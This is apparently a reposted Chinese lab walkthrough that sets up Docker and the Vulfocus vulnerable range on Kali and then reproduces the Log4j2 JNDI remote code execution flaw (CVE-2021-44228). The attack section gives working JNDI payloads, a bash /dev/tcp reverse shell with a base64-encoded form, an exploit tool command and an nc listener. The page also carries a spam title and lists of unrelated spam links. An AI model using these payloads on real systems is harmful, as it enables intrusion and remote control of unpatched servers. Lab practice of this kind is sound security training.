当前位置: 首页 > wzjs >正文

wordpress更换网站数据库重庆山艺网站建设

wordpress更换网站数据库,重庆山艺网站建设,网站制作工作室24小时接单,南涧县城乡建设局网站这里使用了两台KALI虚拟机,一台用于安装靶场环境,一台用于攻击 一、Docker的安装(靶机) 1、Linux内核版本查看 #安装docker要求内核版本kerner>3.10 #为此,先检查当前Linux系统的内核版本 uname -a 2、Linux apt…

这里使用了两台KALI虚拟机,一台用于安装靶场环境,一台用于攻击

一、Docker的安装(靶机)

1、Linux内核版本查看

#安装docker要求内核版本kerner>=3.10
#为此,先检查当前Linux系统的内核版本
uname -a

2、Linux apt源换源教程

#进入sources.lis重新编辑apt源
vim /etc/apt/sources.list
#直接CV大法写入下面的apt源
#其他apt源
#此处仅添加中科达和阿里的,其他注释掉#中科大
deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib
deb-src http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib#阿里云
deb http://mirrors.aliyun.com/kali kali-rolling main non-free contrib
deb-src http://mirrors.aliyun.com/kali kali-rolling main non-free contrib#清华大学
#deb http://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main contrib non-free
#deb-src https://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main contrib non-free#浙大
#deb http://mirrors.zju.edu.cn/kali kali-rolling main contrib non-free
#deb-src http://mirrors.zju.edu.cn/kali kali-rolling main contrib non-free#东软大学
#deb http://mirrors.neusoft.edu.cn/kali kali-rolling/main non-free contribp.kali.org/kali kali-rolling main non-free contrib#重庆大学
#deb http://http.kali.org/kali kali-rolling main non-free contrib
#deb-src http://http.kali.org/kali kali-rolling main non-free contrib

3、进行系统或工具的更新

#进行系统和工具的更新(比较久,去隔壁玩两把游戏)
#注:当出现正在设定软件包界面时,直接按tab+enter进行确认
apt-get update && apt-get upgrade && apt-get dist-upgrade#清除更新缓存
apt-get clean

4、采用apt安装Docker

#这里采用apt安装,因为之后采用apt源安装Docker的其他组件时,新组件与已安装的Docker容器最为匹配。
apt-get install docker docker-compose#或
apt-get install docker.io

5、检验Docker成功安装

#启动docker服务
service docker start
#列出docker现有镜像
docker images
#运行hello-world镜像
#但apt安装的docker没带有hello-world默认镜像呀,所以下面的命令不成功,它会帮你拉去该镜像下来
docker run hello-world
由于各种网络政策,在国内访问DockerHub速度会非常缓慢,大家一般都会采取更换镜像源的方式来进行加速。

运行时会报错,需要配置docker镜像加速

6、Docker换源教程

2024.6之后,由于政策的加强,大部分常见的镜像源已经无法使用,如下图:

截止2025.4.16,下列镜像源均可用。(基于能否成功拉取hello-world进行测试)

DockerHub可用镜像源汇总

http://docker.m.daocloud.io

http://docker.imgdb.de

docker-0.unsee.tech

http://docker.hlmirror.com

docker.1ms.run

func.ink

http://lispy.org

http://docker.xiaogenban1993.com

换源方法1-临时换源

格式如下:(不要加上前缀https://

sudo docker pull+镜像源地址+/+要拉取的镜像名

例如:

镜像源为“docker.m.daocloud.io”,要拉取的镜像名为“hello-world”,

sudo docker pull docker.m.daocloud.io/hello-world

成功拉取,如下图:

注意:此方法每次拉取镜像时都需要指定相应的镜像源

换源方法2-永久换源(推荐)

核心思想:修改docker的配置文件 daemon.json,将镜像源地址写入其中。

以ubuntu22.04为例,其余操作系统同理

1、创建目录(如果已经有该目录,则忽略此步骤)

sudo mkdir -p /etc/docker

知识点补充:添加“-p”,执行此命令会先检查目录是否存在。若不存在,则创建相应目录;否则,不执行任何操作。因此不管是否有该目录,直接执行此命令都没问题,不会报错

2、向配置文件写入镜像源

格式如下:(需要加上前缀https://

{"registry-mirrors": ["镜像源1","镜像源2"]
}

例如,根据2025.4.16最新测试的可用镜像源,我在此给出命令行文本编辑器两种操作方法。

下列两种方法均可直接使用,不会报错。

1. 方法一:直接命令行输入

直接将下列文本粘贴到终端中,然后回车运行即可。

sudo tee /etc/docker/daemon.json <<-'EOF'
{"registry-mirrors": ["https://docker-0.unsee.tech","https://docker.m.daocloud.io","https://docker.imgdb.de","https://docker.hlmirror.com","https://docker.1ms.run","https://func.ink","https://lispy.org","https://docker.xiaogenban1993.com"]
}
EOF

知识点补充:<<-'EOF' 告诉 shell 接下来的所有内容会被传递到命令 tee,直到遇到标记 EOF 为止,用于将多行内容作为输入传递给命令。所以不需要担心输入一行之后系统就开始执行命令。 此外,若daemon.json文件不存在,直接使用tee命令不会报错,而是会创建名为daemon.json的文件。

2. 方法二:通过文本编辑器打开daemon.json,然后粘贴

首先打开配置文件:

sudo nano /etc/docker/daemon.json

然后直接粘贴下列内容:

{"registry-mirrors": ["https://docker.m.daocloud.io","https://docker.imgdb.de","https://docker-0.unsee.tech","https://docker.hlmirror.com","https://docker.1ms.run","https://func.ink","https://lispy.org","https://docker.xiaogenban1993.com"]
}

知识点补充:若daemon.json文件不存在,直接使用nano命令不会报错,而是会创建名为daemon.json的文件。

1、重启docker服务

sudo systemctl daemon-reload && sudo systemctl restart docker

    2、验证

    sudo docker pull hello-world

    出现下图,即为成功!

    安装vulfocus镜像

    docker pull vulfocus/vulfocus:latest

    二、搭建Vulfocus靶场并配置vulfocus漏洞环境(靶机)

    1、安装vulfocus镜像

    docker pull vulfocus/vulfocus:latest

    2、运行vulfocus

    docker create -p 8888:80 -v /var/run/docker.sock:/var/run/docker.sock -e VUL_IP=172.17.0.1 vulfocus/vulfocus
    各个参数的简单解释:
    -p :前边的端口代表物理机的端口,后边的端口是docker的端口
    -v :/var/run/docker.sock:/var/run/docker.sock为docker交互连接。
    -e:
    VUL_IP=172.17.0.1 为Docker服务器 IP,不能为 127.0.0.1。
    vulfocus/vulfocus是上面的仓库镜像名,也可以用镜像ID。

    可以用ifconfig命令来确认当前的docker服务器ip:

    接着用这个命令来查看当前docker的所有服务,可以看到我们刚刚起的服务:

    docker ps -a

    运行vulfocus容器:

    docker start 6cbc5770a44e 

    状态为up,代表成功启动。
    由本地的8888端口映射到docker的80端口
    最后访问在主机访问虚拟机IP的8888端口即可:

    默认账号密码admin/admin

    初始账号密码登进来以后,空空的,需要自己添加漏洞环境进来。

    3、添加镜像

    点击镜像管理模块,直接一键同步,就是官方的所有漏洞环境,反正点这个就好了:

    同步之后,刷新页面,就可以看到漏洞环境了,挑选自己喜欢的一个一个下载就好,我这里下载了log4j2环境
    也可以点击添加,直接一键导入,这个就很久了,最好在WiFi环境下下载吧,流量多的大佬另当别论哈

    启动后会生成一个端口号

    在虚拟机IP后加上端口就可以打开靶机了

    三、KALI中maven 的安装与配置(攻击机)

    1、在另一台kali上下载 maven 安装包(作为攻击机)

    wget https://dlcdn.apache.org/maven/maven-3/3.9.4/binaries/apache-maven-3.9.4-bin.tar.gz

    2、解压 apache-maven-3.9.4-bin.tar.gz

    tar -zxvf apache-maven-3.9.4-bin.tar.gz

    找到文件解压到的位置,由于解压时我们没有指定路径,因此默认解压到当前路径下

    可以看到路径为:/root/apache-maven-3.9.4

    (看你自己把文件压缩包下载到哪里,在哪里进行解压的)

    3、修改配置文件 /etc/profile

    vim /etc/profile

    在配置文件中加上:

    export MAVEN_HOME=/root/apache-maven-3.9.4 # 你自己文件解压后所在的位置
    export PATH=$MAVEN_HOME/bin:$PATH

    4、wq保存退出后,刷新配置文件,以确保修改生效

    source /etc/profile

    5、检测是否安装成功,查看 maven 版本

    mvn -version

    6、这里存在一个问题,当我们重启一个终端时,发现 mvn 命令依旧无法识别

    使用命令

    sudo apt-get install maven

    重启客户机

    四、Log4j2远程命令执行(CVE-2021-44228)漏洞复现(攻击机)

    1、启动环境

    点击问号跳转


    发现url会出现变化

    schema 是查找jndi对象的方式,jdk中支持 corbname, dns, iiop, iiopname, ldap, ldaps, rmi几种schema。

    漏洞利用语句如下(替换 schema://url):

    ${jndi:schema://url}

    验证是否存在Log4j2远程代码执行,首先在DNSlog获取一个域名。

    DNSLog PlatformDNSLog平台http://dnslog.cn/

    输入下面的内容,注意替换你自己获得的域名

    ${jndi:ldap://${sys:java.version}.eee2rj.dnslog.cn}

    这里注意,进行url编码

    Java程序解析这个表达式时,会将 ${sys:java.version} 替换为当前 JVM 的实际版本号,这样你在DNSlog就能看到相关信息

    2、JNDI 注入工具安装

    首先安装 JNDI 注入工具:JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar

    git clone https://github.com/welk1n/JNDI-Injection-Exploit.git

    切换到 JNDI-Injection-Exploit 目录

    cd JNDI-Injection-Exploit

    编译安装,在该目录下执行如下命令

    mvn clean package -DskipTests

    编译安装完成后,我们会得到一个 jar 文件

    位置在:/root/JNDI-Injection-Exploit/target/JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar

    在运行结果的最后是这样:

    切换进入到 target 目录:

    cd target

    3、工具用法

    java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "想要执行的命令" -A "攻击机的ip"

    4、服务站点部署

    反弹 shell 到目标主机端口,大家注意改成自己的IP和端口,这里以 7777 端口为例

    bash -i >& /dev/tcp/192.168.217.134/7777 0>&1

    对命令进行 base64 编码 (命令必须经过编码,不然无法实现)

    Runtime.exec Payload Generater | AresX's Blog (ares-x.com)

    Runtime.exec Payload Generater | AresX's BlogThere is no descriptionhttps://ares-x.com/tools/runtime-exec

    得到

    bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIxNy4xMzQvNzc3NyAwPiYx}|{base64,-d}|{bash,-i}

    将想要执行的命令替换成我们得到的 payload,以及填上我们的攻击机ip

    利用 JNDI 注入工具把这个反弹 shell 命令部署到 LDAP 服务上

    在 target 目录下,执行如下命令:

    java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIxNy4xMzQvNzc3NyAwPiYx}|{base64,-d}|{bash,-i}" -A "192.168.217.134"

    4、开启端口监听

    再开一个终端,监听我们对应的端口(我这里的 payload 里为 7777)

    nc -lvvp 7777

    5、反弹shell

    使用上述给出的 payload 路径构造完整 payload

    比如:

    ${jndi:rmi://192.168.217.134:1099/lzdfyj}
    ${jndi:ldap://192.168.217.134:1389/qtbchd}

    我们可以针对不同版本和不同情况使用不同的服务和不同的 payload

    url编码

    成功反弹shell


    文章转载自:

    http://sPiLRmUm.nxbzz.cn
    http://tnLPz4Pg.nxbzz.cn
    http://xZ4mU02y.nxbzz.cn
    http://Lbt9ZDnx.nxbzz.cn
    http://V3hhEh12.nxbzz.cn
    http://CYc1sYLu.nxbzz.cn
    http://mEztfBHn.nxbzz.cn
    http://IEmoOcS6.nxbzz.cn
    http://ksPvOJAB.nxbzz.cn
    http://IrJLkIqK.nxbzz.cn
    http://OsbqfMq9.nxbzz.cn
    http://cuzNZb6c.nxbzz.cn
    http://GRmbqof6.nxbzz.cn
    http://GcQfUelx.nxbzz.cn
    http://zQS3zU2x.nxbzz.cn
    http://FqOpCQwl.nxbzz.cn
    http://SWJd8Fdv.nxbzz.cn
    http://R3UfHMsi.nxbzz.cn
    http://Ii56wOwA.nxbzz.cn
    http://U1ZGvPhG.nxbzz.cn
    http://pGTtbgCD.nxbzz.cn
    http://X5pxvrY3.nxbzz.cn
    http://Wp43Aj1x.nxbzz.cn
    http://Cy36xTo8.nxbzz.cn
    http://MiSbNoKy.nxbzz.cn
    http://0wJbmL6D.nxbzz.cn
    http://iVPYlhSX.nxbzz.cn
    http://elwbqWAA.nxbzz.cn
    http://S9zWrhgS.nxbzz.cn
    http://qZEOdISM.nxbzz.cn
    http://www.dtcms.com/wzjs/688464.html

    相关文章:

  1. 提供网站建设和制作小县城做房地产网站
  2. 鹤壁市建设局网站阿里云1核2g服务器能建设几个网站
  3. 网站建设服务器出租wordpress 访问地址修改
  4. 手机搭建平台网站网站刚通过备案
  5. 电子商务网站会员体系上海外贸总公司是做什么的
  6. 网站推广方法有免费制作详情页的网站
  7. 宠物交易网站开发wordpress网站logo没显示
  8. 湖北皇奥建设工程有限公司网站设计网站网站名称
  9. 提供网站建设教学视频一支部一品牌一特色方案
  10. 微网站开发需求学历提升中心
  11. 比较好的公文写作网站网站建设招聘兼职
  12. WordPress网站文章导出导入wordpress英文主题汉化
  13. 智慧旅游网站开发与设计与实现app代理推广合作50元
  14. 网站制作的分割线怎么做北京市网站公司网站
  15. 国内优秀wordpress主题苏州关键词优化软件
  16. 做网站南充为什么做网站必须要用域名
  17. 区块链 网站 怎么做软件开发公司优势
  18. 游戏公司做网站网站域名查询官网
  19. 镇江市建设工程网站军队采购网
  20. 做女装网站应怎么定位自媒体营销平台
  21. 网络销售平台推广seo 能提高网站速度吗
  22. 网站开发杭州平面广告设计培训招生
  23. 贵阳市建设管理信息网站微信兼职平台网站开发
  24. 邢台物流网站建设网站多少页面合适
  25. 扁平化设计风格的网站wordpress 安装百度统计
  26. 自己网站怎么做百度推广福州专业网站营销
  27. 丰都网站建设费用中国建设银行网站设计评价
  28. 新乡网站建设求职简历怎样卸载下载的wordpress
  29. 乐清女孩网站优化电话
  30. 国外公司做中国网站中国移动网站备案管理系统